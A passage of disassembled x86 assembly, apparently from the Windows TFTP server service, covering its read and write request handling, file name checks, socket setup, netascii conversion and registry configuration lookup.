		push	esi
		call	dword_100104C	; RtlLeaveCriticalSection
		xor	eax, eax


loc_1002EBC:				; CODE XREF: sub_1002CE6+10Cj
		pop	edi
		pop	esi
		pop	ebx
		leave
		retn	8
sub_1002CE6	endp


; =============== S U B	R O U T	I N E =======================================



sub_1002EC3	proc near		; CODE XREF: sub_1002EC8+22p
					; sub_1002EC8+2Bp
		xor	eax, eax
		retn	8
sub_1002EC3	endp


; =============== S U B	R O U T	I N E =======================================



sub_1002EC8	proc near		; CODE XREF: sub_1001A91+254p

arg_0		= dword	ptr  4

		push	esi
		mov	esi, [esp+4+arg_0]
		push	dword ptr [esi+8]
		call	sub_10028B5
		test	eax, eax
		jz	short loc_1002F0A
		mov	ecx, [eax+24h]
		dec	ecx
		jz	short loc_1002F03
		dec	ecx
		jz	short loc_1002EFA
		dec	ecx
		jz	short loc_1002EF1
		dec	ecx
		jnz	short loc_1002F0A
		push	esi
		push	eax
		call	sub_1002EC3
		jmp	short loc_1002F0A
; ---------------------------------------------------------------------------


loc_1002EF1:				; CODE XREF: sub_1002EC8+1Bj
		push	esi
		push	eax
		call	sub_1002EC3
		jmp	short loc_1002F0A
; ---------------------------------------------------------------------------


loc_1002EFA:				; CODE XREF: sub_1002EC8+18j
		push	esi
		push	eax
		call	sub_1002CE6
		jmp	short loc_1002F0A
; ---------------------------------------------------------------------------


loc_1002F03:				; CODE XREF: sub_1002EC8+15j
		push	esi
		push	eax
		call	sub_1002B5E


loc_1002F0A:				; CODE XREF: sub_1002EC8+Fj
					; sub_1002EC8+1Ej ...
		pop	esi
		retn	4
sub_1002EC8	endp


; =============== S U B	R O U T	I N E =======================================



sub_1002F0E	proc near		; CODE XREF: sub_1002F31+20p
					; sub_100333A+41p

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

		xor	eax, eax
		cmp	[esp+arg_4], eax
		jbe	short loc_1002F27


loc_1002F16:				; CODE XREF: sub_1002F0E+17j
		mov	ecx, [esp+arg_0]
		cmp	byte ptr [eax+ecx], 0
		jz	short loc_1002F2C
		inc	eax
		cmp	eax, [esp+arg_4]
		jb	short loc_1002F16


loc_1002F27:				; CODE XREF: sub_1002F0E+6j
		xor	eax, eax

locret_1002F29:				; CODE XREF: sub_1002F0E+21j
		retn	8
; ---------------------------------------------------------------------------


loc_1002F2C:				; CODE XREF: sub_1002F0E+10j
		push	1
		pop	eax
		jmp	short locret_1002F29
sub_1002F0E	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_1002F31	proc near		; CODE XREF: sub_1001A91+223p
					; DATA XREF: sub_1001A91+1FCo

var_28		= word ptr -28h
var_26		= word ptr -26h
var_24		= dword	ptr -24h
var_18		= dword	ptr -18h
var_14		= dword	ptr -14h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		sub	esp, 28h
		push	ebx
		and	[ebp+var_10], 0
		and	[ebp+var_14], 0
		push	esi
		mov	esi, [ebp+arg_0]
		push	edi
		push	0FFBAh
		lea	ebx, [esi+36h]
		push	ebx
		mov	[ebp+var_18], ebx
		call	sub_1002F0E
		test	eax, eax
		jz	loc_100330F
		mov	edi, ebx
		or	ecx, 0FFFFFFFFh
		xor	eax, eax
		push	10034h
		repne scasb
		not	ecx
		dec	ecx
		lea	eax, [ecx+ebx+1]
		mov	[ebp+var_4], eax
		call	dword_1001094	; malloc
		mov	ebx, eax
		pop	ecx
		test	ebx, ebx
		jz	loc_1003331
		mov	ecx, 400Dh
		xor	eax, eax
		mov	edi, ebx
		rep stosd
		push	dword ptr [esi+10h]
		call	dword_1001120	; inet_ntoa
		mov	[ebp+var_8], eax
		mov	ax, [esi+0Eh]
		push	eax
		call	dword_1001104	; ntohs
		mov	edi, [ebp+var_4]
		mov	[ebp+var_C], edi
		mov	al, [edi]
		test	al, al
		jz	short loc_1002FCD


loc_1002FB5:				; CODE XREF: sub_1002F31+97j
		movsx	eax, al
		push	eax
		call	dword_1001150	; tolower
		mov	[edi], al
		mov	al, [edi+1]
		inc	edi
		pop	ecx
		test	al, al
		jnz	short loc_1002FB5
		mov	[ebp+var_C], edi


loc_1002FCD:				; CODE XREF: sub_1002F31+82j
		mov	edi, [ebp+var_4]
		mov	eax, offset aNetascii ;	"netascii"


loc_1002FD5:				; CODE XREF: sub_1002F31+C0j
		mov	dl, [edi]
		mov	cl, dl
		cmp	dl, [eax]
		jnz	short loc_1002FF7
		test	cl, cl
		jz	short loc_1002FF3
		mov	dl, [edi+1]
		mov	cl, dl
		cmp	dl, [eax+1]
		jnz	short loc_1002FF7
		inc	edi
		inc	edi
		inc	eax
		inc	eax
		test	cl, cl
		jnz	short loc_1002FD5


loc_1002FF3:				; CODE XREF: sub_1002F31+AEj
		xor	eax, eax
		jmp	short loc_1002FFC
; ---------------------------------------------------------------------------


loc_1002FF7:				; CODE XREF: sub_1002F31+AAj
					; sub_1002F31+B8j
		sbb	eax, eax
		sbb	eax, 0FFFFFFFFh


loc_1002FFC:				; CODE XREF: sub_1002F31+C4j
		test	eax, eax
		jz	short loc_1003037
		mov	edi, [ebp+var_4]
		mov	eax, offset aOctet ; "octet"


loc_1003008:				; CODE XREF: sub_1002F31+F3j
		mov	dl, [edi]
		mov	cl, dl
		cmp	dl, [eax]
		jnz	short loc_100302A
		test	cl, cl
		jz	short loc_1003026
		mov	dl, [edi+1]
		mov	cl, dl
		cmp	dl, [eax+1]
		jnz	short loc_100302A
		inc	edi
		inc	edi
		inc	eax
		inc	eax
		test	cl, cl
		jnz	short loc_1003008


loc_1003026:				; CODE XREF: sub_1002F31+E1j
		xor	eax, eax
		jmp	short loc_100302F
; ---------------------------------------------------------------------------


loc_100302A:				; CODE XREF: sub_1002F31+DDj
					; sub_1002F31+EBj
		sbb	eax, eax
		sbb	eax, 0FFFFFFFFh


loc_100302F:				; CODE XREF: sub_1002F31+F7j
		test	eax, eax
		jnz	loc_10032F6


loc_1003037:				; CODE XREF: sub_1002F31+CDj
		mov	edi, [ebp+var_18]
		or	ecx, 0FFFFFFFFh
		xor	eax, eax
		lea	edx, [esi+1FFADh]
		repne scasb
		not	ecx
		sub	edi, ecx
		push	edx
		mov	eax, ecx
		mov	esi, edi
		mov	edi, edx
		mov	[ebp+var_4], edx
		shr	ecx, 2
		rep movsd
		mov	ecx, eax
		and	ecx, 3
		rep movsb
		call	sub_100261E
		test	eax, eax
		jnz	short loc_1003071
		push	offset aMalformedFileN ; "Malformed file name"
		jmp	short loc_10030CB
; ---------------------------------------------------------------------------


loc_1003071:				; CODE XREF: sub_1002F31+137j
		push	[ebp+var_8]
		push	offset dword_1005CE8
		call	sub_10039D6
		test	eax, eax
		jnz	short loc_1003093
		push	[ebp+var_8]
		push	offset dword_1005D20
		call	sub_10039D6
		test	eax, eax
		jz	short loc_10030A4


loc_1003093:				; CODE XREF: sub_1002F31+14Fj
		push	[ebp+var_4]
		push	offset dword_1005D58
		call	sub_10039D6
		test	eax, eax
		jnz	short loc_10030B0


loc_10030A4:				; CODE XREF: sub_1002F31+160j
		call	dword_10010AC	; _errno
		push	0
		push	2
		jmp	short loc_1003100
; ---------------------------------------------------------------------------


loc_10030B0:				; CODE XREF: sub_1002F31+171j
		push	(offset	dword_1005E07+1)
		push	0FFBCh
		push	[ebp+var_4]
		call	sub_100273D
		test	eax, eax
		jnz	short loc_10030CF
		push	offset aFileNameTooLon ; "File name too	long"


loc_10030CB:				; CODE XREF: sub_1002F31+13Ej
		push	0
		jmp	short loc_1003100
; ---------------------------------------------------------------------------


loc_10030CF:				; CODE XREF: sub_1002F31+193j
		push	8000h
		push	[ebp+var_4]
		call	dword_10010E4	; _open
		pop	ecx
		cmp	eax, 0FFFFFFFFh
		pop	ecx
		mov	[ebx+1002Ch], eax
		jnz	short loc_1003116
		mov	esi, dword_10010AC
		call	esi ; dword_10010AC
		push	dword ptr [eax]
		call	dword_100102C	; RtlSetLastWin32Error
		call	esi ; dword_10010AC
		push	0
		push	1


loc_1003100:				; CODE XREF: sub_1002F31+17Dj
					; sub_1002F31+19Cj
		mov	eax, [ebp+arg_0]
		push	dword ptr [eax+8]
		lea	ecx, [eax+0FFF1h]
		add	eax, 0Ch
		push	ecx
		push	eax
		jmp	loc_1003308
; ---------------------------------------------------------------------------


loc_1003116:				; CODE XREF: sub_1002F31+1B7j
		mov	edi, dword_1001088
		push	2
		push	0
		push	eax
		call	edi ; dword_1001088
		mov	esi, [ebp+arg_0]
		add	esp, 0Ch
		cmp	eax, 0FFFFFFFFh
		jz	short loc_1003140
		push	0
		push	0
		mov	[esi+24h], eax
		push	dword ptr [ebx+1002Ch]
		call	edi ; dword_1001088
		add	esp, 0Ch


loc_1003140:				; CODE XREF: sub_1002F31+1FBj
		cmp	eax, 0FFFFFFFFh
		jnz	short loc_1003159
		mov	edi, dword_10010AC
		call	edi ; dword_10010AC
		call	edi ; dword_10010AC
		push	dword ptr [eax]
		call	dword_100102C	; RtlSetLastWin32Error
		jmp	short loc_1003197
; ---------------------------------------------------------------------------


loc_1003159:				; CODE XREF: sub_1002F31+212j
		push	0
		push	2
		push	2
		call	dword_100112C	; socket
		mov	edi, eax
		cmp	edi, 0FFFFFFFFh
		mov	[ebp+var_4], edi
		jz	short loc_1003191
		mov	eax, [esi+1Ch]
		and	[ebp+var_26], 0
		mov	[ebp+var_24], eax
		lea	eax, [ebp+var_28]
		push	10h
		push	eax
		push	edi
		mov	[ebp+var_28], 2
		call	dword_1001124	; bind
		test	eax, eax
		jz	short loc_10031A3


loc_1003191:				; CODE XREF: sub_1002F31+23Cj
		call	dword_10010F8	; WSAGetLastError


loc_1003197:				; CODE XREF: sub_1002F31+226j
		push	offset aInsufficientRe ; "Insufficient resources"
		push	0
		jmp	loc_10032FA
; ---------------------------------------------------------------------------


loc_10031A3:				; CODE XREF: sub_1002F31+25Ej
		push	ebx
		mov	[esi+8], edi
		call	dword_1001044	; InitializeCriticalSection
		mov	[ebx+20h], edi
		add	esi, 0Ch
		lea	edi, [ebx+28h]
		mov	[ebp+var_8], esi
		movsd
		movsd
		movsd
		movsd
		xor	edi, edi
		push	edi
		push	edi
		push	edi
		push	edi
		call	dword_1001040	; CreateEventA
		cmp	eax, edi
		mov	[ebx+0FFF8h], eax
		jz	short loc_10031E8
		push	2
		push	eax
		push	[ebp+var_4]
		call	sub_100188E
		cmp	eax, edi
		mov	[ebx+0FFFCh], eax
		jnz	short loc_10031F3


loc_10031E8:				; CODE XREF: sub_1002F31+2A0j
		call	dword_1001038	; RtlGetLastWin32Error
		jmp	loc_1003312
; ---------------------------------------------------------------------------


loc_10031F3:				; CODE XREF: sub_1002F31+2B5j
		add	ebx, 18h
		push	ebx
		call	sub_100287F
		push	1
		pop	esi
		push	[ebp+var_4]
		mov	[ebp+var_14], esi
		call	sub_10028B5
		mov	ebx, eax
		cmp	ebx, edi
		jz	loc_1003312
		lea	edi, [ebx+10028h]
		lea	eax, [ebx+38h]
		push	edi
		push	eax
		lea	eax, [ebx+10024h]
		mov	[ebp+var_10], esi
		push	eax
		mov	eax, [ebp+var_C]
		push	esi
		mov	esi, [ebp+arg_0]
		inc	eax
		push	eax
		push	esi
		call	sub_10023D8
		test	eax, eax
		jnz	loc_1003312
		cmp	[edi], eax
		jz	short loc_1003255
		mov	eax, [esi+28h]
		imul	eax, 3E8h
		mov	[ebx+10000h], eax
		jmp	short loc_100325F
; ---------------------------------------------------------------------------


loc_1003255:				; CODE XREF: sub_1002F31+311j
		mov	dword ptr [ebx+10000h],	3E8h


loc_100325F:				; CODE XREF: sub_1002F31+322j
		mov	eax, [ebx+10000h]
		push	0
		push	eax
		push	eax
		push	dword ptr [ebx+20h]
		lea	eax, [ebx+10004h]
		push	offset sub_1002A3D
		push	eax
		push	dword_10060A0
		call	dword_1001178	; RtlCreateTimer
		push	1
		pop	edi
		mov	[ebx+24h], edi
		mov	eax, [esi+20h]
		push	esi
		push	ebx
		mov	[ebx+10018h], eax
		mov	[ebx+10014h], di
		call	sub_10027E1
		push	10h
		xor	ecx, ecx
		push	[ebp+var_8]
		cmp	eax, ecx
		mov	[ebx+1000Ch], ecx
		push	ecx
		push	dword ptr [ebx+10020h]
		jz	short loc_10032D9
		lea	eax, [ebx+38h]
		push	eax
		push	[ebp+var_4]
		call	dword_1001130	; sendto
		mov	ecx, [ebx+1001Ch]
		cmp	ecx, [esi+20h]
		jnb	short loc_10032E9
		mov	[ebx+10030h], edi
		jmp	short loc_10032E9
; ---------------------------------------------------------------------------


loc_10032D9:				; CODE XREF: sub_1002F31+386j
		add	esi, 0FFF1h
		push	esi
		push	[ebp+var_4]
		call	dword_1001130	; sendto


loc_10032E9:				; CODE XREF: sub_1002F31+39Ej
					; sub_1002F31+3A6j
		cmp	eax, 0FFFFFFFFh
		jnz	short loc_1003312
		call	dword_10010F8	; WSAGetLastError
		jmp	short loc_1003312
; ---------------------------------------------------------------------------


loc_10032F6:				; CODE XREF: sub_1002F31+100j
		push	0
		push	4


loc_10032FA:				; CODE XREF: sub_1002F31+26Dj
		push	dword ptr [esi+8]
		lea	eax, [esi+0FFF1h]
		add	esi, 0Ch
		push	eax
		push	esi


loc_1003308:				; CODE XREF: sub_1002F31+1E0j
		call	sub_100230A
		jmp	short loc_1003312
; ---------------------------------------------------------------------------


loc_100330F:				; CODE XREF: sub_1002F31+27j
		mov	ebx, [ebp+arg_0]


loc_1003312:				; CODE XREF: sub_1002F31+2BDj
					; sub_1002F31+2DDj ...
		test	ebx, ebx
		jz	short loc_1003331
		cmp	[ebp+var_10], 0
		jz	short loc_1003323
		push	ebx
		call	dword_100104C	; RtlLeaveCriticalSection


loc_1003323:				; CODE XREF: sub_1002F31+3E9j
		cmp	[ebp+var_14], 0
		jnz	short loc_1003331
		push	ebx
		call	dword_10010A0	; free
		pop	ecx


loc_1003331:				; CODE XREF: sub_1002F31+50j
					; sub_1002F31+3E3j ...
		pop	edi
		pop	esi
		xor	eax, eax
		pop	ebx
		leave
		retn	4
sub_1002F31	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_100333A	proc near		; DATA XREF: sub_1001A91+20Fo

var_28		= word ptr -28h
var_26		= word ptr -26h
var_24		= dword	ptr -24h
var_18		= dword	ptr -18h
var_14		= dword	ptr -14h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		sub	esp, 28h
		and	[ebp+var_10], 0
		and	[ebp+var_14], 0
		push	ebx
		push	esi
		push	edi
		push	10034h
		call	dword_1001094	; malloc
		mov	ebx, eax
		pop	ecx
		test	ebx, ebx
		jz	loc_1003731
		mov	ecx, 400Dh
		xor	eax, eax
		mov	edi, ebx
		push	0FFBAh
		rep stosd
		mov	eax, [ebp+arg_0]
		lea	esi, [eax+36h]
		push	esi
		mov	[ebp+var_4], esi
		call	sub_1002F0E
		test	eax, eax
		jz	loc_1003712
		mov	edi, esi
		or	ecx, 0FFFFFFFFh
		xor	eax, eax
		repne scasb
		mov	edi, [ebp+arg_0]
		not	ecx
		push	dword ptr [edi+10h]
		dec	ecx
		lea	esi, [ecx+esi+1]
		call	dword_1001120	; inet_ntoa
		mov	[ebp+var_18], eax
		mov	ax, [edi+0Eh]
		push	eax
		call	dword_1001104	; ntohs
		cmp	byte ptr [esi],	0
		mov	edi, esi
		mov	[ebp+var_C], edi
		jz	short loc_10033E1


loc_10033BC:				; CODE XREF: sub_100333A+A2j
		movsx	eax, byte ptr [edi]
		push	eax
		call	dword_100114C	; isupper
		test	eax, eax
		movsx	eax, byte ptr [edi]
		pop	ecx
		jz	short loc_10033D6
		push	eax
		call	dword_1001150	; tolower
		pop	ecx


loc_10033D6:				; CODE XREF: sub_100333A+92j
		mov	[edi], al
		inc	edi
		cmp	byte ptr [edi],	0
		jnz	short loc_10033BC
		mov	[ebp+var_C], edi


loc_10033E1:				; CODE XREF: sub_100333A+80j
		mov	eax, offset aNetascii ;	"netascii"
		mov	edi, esi


loc_10033E8:				; CODE XREF: sub_100333A+CAj
		mov	dl, [edi]
		mov	cl, dl
		cmp	dl, [eax]
		jnz	short loc_100340A
		test	cl, cl
		jz	short loc_1003406
		mov	dl, [edi+1]
		mov	cl, dl
		cmp	dl, [eax+1]
		jnz	short loc_100340A
		inc	edi
		inc	edi
		inc	eax
		inc	eax
		test	cl, cl
		jnz	short loc_10033E8


loc_1003406:				; CODE XREF: sub_100333A+B8j
		xor	eax, eax
		jmp	short loc_100340F
; ---------------------------------------------------------------------------


loc_100340A:				; CODE XREF: sub_100333A+B4j
					; sub_100333A+C2j
		sbb	eax, eax
		sbb	eax, 0FFFFFFFFh


loc_100340F:				; CODE XREF: sub_100333A+CEj
		test	eax, eax
		jnz	short loc_100341F
		mov	dword ptr [ebx+10030h],	4000h
		jmp	short loc_100345D
; ---------------------------------------------------------------------------


loc_100341F:				; CODE XREF: sub_100333A+D7j
		mov	edi, offset aOctet ; "octet"


loc_1003424:				; CODE XREF: sub_100333A+106j
		mov	cl, [esi]
		mov	al, cl
		cmp	cl, [edi]
		jnz	short loc_1003446
		test	al, al
		jz	short loc_1003442
		mov	cl, [esi+1]
		mov	al, cl
		cmp	cl, [edi+1]
		jnz	short loc_1003446
		inc	esi
		inc	esi
		inc	edi
		inc	edi
		test	al, al
		jnz	short loc_1003424


loc_1003442:				; CODE XREF: sub_100333A+F4j
		xor	eax, eax
		jmp	short loc_100344B
; ---------------------------------------------------------------------------


loc_1003446:				; CODE XREF: sub_100333A+F0j
					; sub_100333A+FEj
		sbb	eax, eax
		sbb	eax, 0FFFFFFFFh


loc_100344B:				; CODE XREF: sub_100333A+10Aj
		test	eax, eax
		jnz	loc_10036F8
		mov	dword ptr [ebx+10030h],	8000h


loc_100345D:				; CODE XREF: sub_100333A+E3j
		mov	eax, [ebp+arg_0]
		mov	edi, [ebp+var_4]
		or	ecx, 0FFFFFFFFh
		lea	edx, [eax+1FFADh]
		xor	eax, eax
		repne scasb
		not	ecx
		sub	edi, ecx
		push	edx
		mov	eax, ecx
		mov	esi, edi
		mov	edi, edx
		mov	[ebp+var_8], edx
		shr	ecx, 2
		rep movsd
		mov	ecx, eax
		and	ecx, 3
		rep movsb
		call	sub_100261E
		test	eax, eax
		jnz	short loc_100349A
		push	offset aMalformedFileN ; "Malformed file name"
		jmp	short loc_10034DF
; ---------------------------------------------------------------------------


loc_100349A:				; CODE XREF: sub_100333A+157j
		push	[ebp+var_18]
		push	offset dword_1005D20
		call	sub_10039D6
		test	eax, eax
		jz	loc_10036EC
		push	[ebp+var_4]
		push	offset dword_1005D90
		call	sub_10039D6
		test	eax, eax
		jz	loc_10036EC
		push	(offset	dword_1005E07+1)
		push	0FFBCh
		push	[ebp+var_8]
		call	sub_100273D
		test	eax, eax
		jnz	short loc_10034E6
		push	offset aFileNameTooLon ; "File name too	long"


loc_10034DF:				; CODE XREF: sub_100333A+15Ej
		push	0
		jmp	loc_10036FC
; ---------------------------------------------------------------------------


loc_10034E6:				; CODE XREF: sub_100333A+19Ej
		push	180h
		push	8302h
		push	[ebp+var_8]
		call	dword_10010E4	; _open
		add	esp, 0Ch
		cmp	eax, 0FFFFFFFFh
		mov	[ebx+1002Ch], eax
		jnz	short loc_100351E
		mov	esi, dword_10010AC
		call	esi ; dword_10010AC
		call	esi ; dword_10010AC
		push	dword ptr [eax]
		call	dword_100102C	; RtlSetLastWin32Error
		jmp	loc_10036F2
; ---------------------------------------------------------------------------


loc_100351E:				; CODE XREF: sub_100333A+1CBj
		xor	esi, esi
		push	esi
		push	2
		push	2
		call	dword_100112C	; socket
		mov	edi, eax
		cmp	edi, 0FFFFFFFFh
		mov	[ebp+var_4], edi
		jnz	short loc_1003546
		call	dword_10010F8	; WSAGetLastError
		push	offset aInsufficientRe ; "Insufficient resources"
		push	esi
		jmp	loc_10036FC
; ---------------------------------------------------------------------------


loc_1003546:				; CODE XREF: sub_100333A+1F9j
		mov	[ebp+var_26], si
		mov	esi, [ebp+arg_0]
		push	10h
		mov	[ebp+var_28], 2
		mov	eax, [esi+1Ch]
		mov	[ebp+var_24], eax
		lea	eax, [ebp+var_28]
		push	eax
		push	edi
		call	dword_1001124	; bind
		test	eax, eax
		jz	short loc_100358A
		call	dword_10010F8	; WSAGetLastError
		push	offset aInsufficientRe ; "Insufficient resources"
		push	0
		push	dword ptr [esi+8]
		lea	eax, [esi+0FFF1h]
		add	esi, 0Ch
		push	eax
		push	esi
		jmp	loc_100370D
; ---------------------------------------------------------------------------


loc_100358A:				; CODE XREF: sub_100333A+22Ej
		lea	eax, [ebx+10028h]
		mov	[esi+8], edi
		push	eax
		lea	eax, [ebx+38h]
		push	eax
		lea	eax, [ebx+10024h]
		push	eax
		mov	eax, [ebp+var_C]
		inc	eax
		push	2
		push	eax
		push	esi
		call	sub_10023D8
		test	eax, eax
		jnz	loc_1003712
		push	ebx
		call	dword_1001044	; InitializeCriticalSection
		mov	[ebx+20h], edi
		add	esi, 0Ch
		lea	edi, [ebx+28h]
		mov	[ebp+var_18], esi
		movsd
		movsd
		movsd
		movsd
		xor	esi, esi
		push	esi
		push	esi
		push	esi
		push	esi
		call	dword_1001040	; CreateEventA
		cmp	eax, esi
		mov	[ebx+0FFF8h], eax
		jz	short loc_10035F8
		push	2
		pop	edi
		push	edi
		push	eax
		push	[ebp+var_4]
		call	sub_100188E
		cmp	eax, esi
		mov	[ebx+0FFFCh], eax
		jnz	short loc_1003603


loc_10035F8:				; CODE XREF: sub_100333A+2A5j
		call	dword_1001038	; RtlGetLastWin32Error
		jmp	loc_1003712
; ---------------------------------------------------------------------------


loc_1003603:				; CODE XREF: sub_100333A+2BCj
		add	ebx, 18h
		push	ebx
		call	sub_100287F
		push	[ebp+var_4]
		mov	[ebp+var_14], 1
		call	sub_10028B5
		mov	ebx, eax
		cmp	ebx, esi
		jz	loc_1003712
		xor	esi, esi
		mov	[ebp+var_10], 1
		cmp	[ebx+10028h], esi
		jz	short loc_100364A
		mov	eax, [ebp+arg_0]
		mov	eax, [eax+28h]
		imul	eax, 3E8h
		mov	[ebx+10000h], eax
		jmp	short loc_1003654
; ---------------------------------------------------------------------------


loc_100364A:				; CODE XREF: sub_100333A+2FAj
		mov	dword ptr [ebx+10000h],	3E8h


loc_1003654:				; CODE XREF: sub_100333A+30Ej
		mov	eax, [ebx+10000h]
		push	esi
		push	eax
		push	eax
		push	dword ptr [ebx+20h]
		lea	eax, [ebx+10004h]
		push	offset sub_1002A3D
		push	eax
		push	dword_10060A0
		call	dword_1001178	; RtlCreateTimer
		mov	eax, [ebp+arg_0]
		mov	ecx, [ebx+10024h]
		mov	[ebx+24h], edi
		cmp	ecx, esi
		mov	eax, [eax+20h]
		mov	[ebx+10018h], eax
		lea	eax, [ebx+10024h]
		jz	short loc_10036A1
		mov	[ebx+10020h], ecx
		mov	[eax], esi
		jmp	short loc_10036C5
; ---------------------------------------------------------------------------


loc_10036A1:				; CODE XREF: sub_100333A+35Bj
		mov	esi, dword_1001104
		push	4
		pop	edi
		push	edi
		call	esi ; dword_1001104
		mov	[ebx+38h], ax
		mov	ax, [ebx+10014h]
		push	eax
		call	esi ; dword_1001104
		mov	[ebx+3Ah], ax
		mov	[ebx+10020h], edi


loc_10036C5:				; CODE XREF: sub_100333A+365j
		push	10h
		lea	eax, [ebx+38h]
		push	[ebp+var_18]
		push	0
		push	dword ptr [ebx+10020h]
		push	eax
		push	[ebp+var_4]
		call	dword_1001130	; sendto
		cmp	eax, 0FFFFFFFFh
		jnz	short loc_1003712
		call	dword_10010F8	; WSAGetLastError
		jmp	short loc_1003712
; ---------------------------------------------------------------------------


loc_10036EC:				; CODE XREF: sub_100333A+16Fj
					; sub_100333A+184j
		call	dword_10010AC	; _errno


loc_10036F2:				; CODE XREF: sub_100333A+1DFj
		push	0
		push	2
		jmp	short loc_10036FC
; ---------------------------------------------------------------------------


loc_10036F8:				; CODE XREF: sub_100333A+113j
		push	0
		push	4


loc_10036FC:				; CODE XREF: sub_100333A+1A7j
					; sub_100333A+207j ...
		mov	eax, [ebp+arg_0]
		push	dword ptr [eax+8]
		lea	ecx, [eax+0FFF1h]
		add	eax, 0Ch
		push	ecx
		push	eax


loc_100370D:				; CODE XREF: sub_100333A+24Bj
		call	sub_100230A


loc_1003712:				; CODE XREF: sub_100333A+48j
					; sub_100333A+274j ...
		test	ebx, ebx
		jz	short loc_1003731
		cmp	[ebp+var_10], 0
		jz	short loc_1003723
		push	ebx
		call	dword_100104C	; RtlLeaveCriticalSection


loc_1003723:				; CODE XREF: sub_100333A+3E0j
		cmp	[ebp+var_14], 0
		jnz	short loc_1003731
		push	ebx
		call	dword_10010A0	; free
		pop	ecx


loc_1003731:				; CODE XREF: sub_100333A+21j
					; sub_100333A+3DAj ...
		pop	edi
		pop	esi
		xor	eax, eax
		pop	ebx
		leave
		retn	4
sub_100333A	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_100373A	proc near		; CODE XREF: sub_1002CE6+D7p

var_1FF70	= byte ptr -1FF70h
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h

		push	ebp
		mov	ebp, esp
		mov	eax, 1FF70h
		call	sub_1003A3E	; _chkstk
		cmp	[ebp+arg_C], 8000h
		push	esi
		push	edi
		jnz	short loc_100375A
		push	[ebp+arg_8]
		push	[ebp+arg_4]
		jmp	short loc_1003792
; ---------------------------------------------------------------------------


loc_100375A:				; CODE XREF: sub_100373A+16j
		mov	edx, [ebp+arg_4]
		xor	ecx, ecx
		xor	esi, esi
		cmp	[ebp+arg_8], ecx
		jle	short loc_1003790
		mov	edi, [ebp+arg_10]


loc_1003769:				; CODE XREF: sub_100373A+54j
		cmp	byte ptr [edi],	0Dh
		jnz	short loc_1003779
		cmp	byte ptr [ecx+edx], 0
		jnz	short loc_1003779
		and	byte ptr [edi],	0
		jmp	short loc_100378A
; ---------------------------------------------------------------------------


loc_1003779:				; CODE XREF: sub_100373A+32j
					; sub_100373A+38j
		mov	al, [ecx+edx]
		mov	[ebp+esi+var_1FF70], al
		inc	esi
		cmp	al, 0Dh
		jnz	short loc_100378A
		mov	[edi], al


loc_100378A:				; CODE XREF: sub_100373A+3Dj
					; sub_100373A+4Cj
		inc	ecx
		cmp	ecx, [ebp+arg_8]
		jl	short loc_1003769


loc_1003790:				; CODE XREF: sub_100373A+2Aj
		push	esi
		push	edx


loc_1003792:				; CODE XREF: sub_100373A+1Ej
		push	[ebp+arg_0]
		call	dword_10010E8	; _write
		mov	edi, eax
		add	esp, 0Ch
		cmp	edi, 0FFFFFFFFh
		jnz	short loc_10037B7
		mov	esi, dword_10010AC
		call	esi ; dword_10010AC
		call	esi ; dword_10010AC
		push	dword ptr [eax]
		call	dword_100102C	; RtlSetLastWin32Error


loc_10037B7:				; CODE XREF: sub_100373A+69j
		mov	eax, edi
		pop	edi
		pop	esi
		leave
		retn	14h
sub_100373A	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_10037BF	proc near		; CODE XREF: sub_1001665:loc_10017F3p

var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4

		push	ebp
		mov	ebp, esp
		sub	esp, 10h
		lea	eax, [ebp+var_10]
		push	ebx
		xor	ebx, ebx
		push	eax
		push	0F003Fh
		push	ebx
		push	offset aSystemCurrentc ; "System\\CurrentControlSet\\Services\\tftpd"...
		push	80000002h
		mov	[ebp+var_4], ebx
		call	dword_1001000	; RegOpenKeyExA
		cmp	eax, ebx
		jz	short loc_10037F6
		call	dword_1001038	; RtlGetLastWin32Error
		xor	eax, eax
		jmp	loc_100390D
; ---------------------------------------------------------------------------


loc_10037F6:				; CODE XREF: sub_10037BF+28j
		cmp	byte ptr dword_1005E07+1, bl
		push	edi
		push	esi
		mov	esi, dword_1001008
		jnz	short loc_100383C
		lea	eax, [ebp+var_8]
		mov	[ebp+var_8], 1F4h
		push	eax
		lea	eax, [ebp+var_C]
		push	(offset	dword_1005E07+1)
		push	eax
		push	ebx
		push	offset aDirectory ; "directory"
		push	[ebp+var_10]
		call	esi ; dword_1001008
		cmp	eax, ebx
		jz	short loc_1003831
		call	dword_1001038	; RtlGetLastWin32Error
		jmp	short loc_100383C
; ---------------------------------------------------------------------------


loc_1003831:				; CODE XREF: sub_10037BF+68j
		push	1
		pop	eax
		cmp	[ebp+var_C], eax
		jnz	short loc_100383C
		mov	[ebp+var_4], eax


loc_100383C:				; CODE XREF: sub_10037BF+45j
					; sub_10037BF+70j ...
		push	32h
		lea	eax, [ebp+var_8]
		pop	edi
		push	eax
		lea	eax, [ebp+var_C]
		push	offset dword_1005CE8
		push	eax
		push	ebx
		push	offset aClients	; "clients"
		push	[ebp+var_10]
		mov	[ebp+var_8], edi
		call	esi ; dword_1001008
		cmp	eax, ebx
		jz	short loc_1003866
		call	dword_1001038	; RtlGetLastWin32Error
		jmp	short loc_100386F
; ---------------------------------------------------------------------------


loc_1003866:				; CODE XREF: sub_10037BF+9Dj
		cmp	[ebp+var_C], 1
		jnz	short loc_100386F
		inc	[ebp+var_4]


loc_100386F:				; CODE XREF: sub_10037BF+A5j
					; sub_10037BF+ABj
		lea	eax, [ebp+var_8]
		mov	[ebp+var_8], edi
		push	eax
		lea	eax, [ebp+var_C]
		push	offset dword_1005D20
		push	eax
		push	ebx
		push	offset aMasters	; "masters"
		push	[ebp+var_10]
		call	esi ; dword_1001008
		cmp	eax, ebx
		jz	short loc_1003896
